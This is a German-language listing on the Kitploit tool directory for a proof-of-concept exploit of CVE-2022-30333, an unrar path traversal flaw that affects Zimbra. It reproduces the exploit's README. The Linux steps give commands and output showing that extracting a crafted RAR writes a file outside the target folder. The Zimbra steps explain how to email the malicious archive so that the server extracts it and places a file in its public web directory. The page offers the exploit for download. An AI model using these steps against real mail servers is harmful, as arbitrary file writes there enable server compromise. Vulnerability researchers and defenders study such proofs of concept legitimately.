Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-30333-PoC — Proof-of-Concept-Exploit für CVE-2022-30333, eine Path-Traversal-Schwachstelle in unrar, das von Zimbra verwendet wird, und beliebiges Dateischreiben über manipulierte RAR-Archive demonstriert. | Kitploit
Tools/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Proof-of-Concept-Exploit für CVE-2022-30333, eine Path-Traversal-Schwachstelle in unrar, das von Zimbra verwendet wird, und beliebiges Dateischreiben über manipulierte RAR-Archive demonstriert.

Repository anzeigen
133vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-30333-POC

Beispieldatei zum Testen von CVE-2022-30333

  • Sample.rar : wenn Sie unter Linux testen möchten. Beim Extrahieren wird trav in ../../tmp/traversed erstellt. Bitte stellen Sie sicher, dass das Verzeichnis ../../tmp/traversed vor dem Extrahieren von Sample.rar existiert.

  • exp.rar : wenn Sie auf dem Zimbra Mail Server testen möchten. Beim Extrahieren wird moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/ erstellt. Sie können auf diese Datei unter https://zimbra_mail_domain/public/moo.txt zugreifen.

AUSNUTZUNGSSCHRITTE

Testen unter Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Testen auf Zimbra

  • Erstellen Sie eine E-Mail und hängen Sie die schädliche RAR-Datei an, senden Sie sie dann an die Zimbra-E-Mail-Adresse. Diese RAR-Datei wird während der Analyse mit Amavisd extrahiert.
  • Die Datei moo.txt sollte sich unter /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt oder https://zimbra_mail_domain/public/moo.txt befinden.

REFERENZEN

  1. Vietnamesischer Blog von DEV2SEC
  2. Englischer Blog von Sonarsource
  3. Besonderer Dank an mrlihd für die Hilfe beim Wiederaufbau der Angriffskette in Zimbra.
Tool herunterladen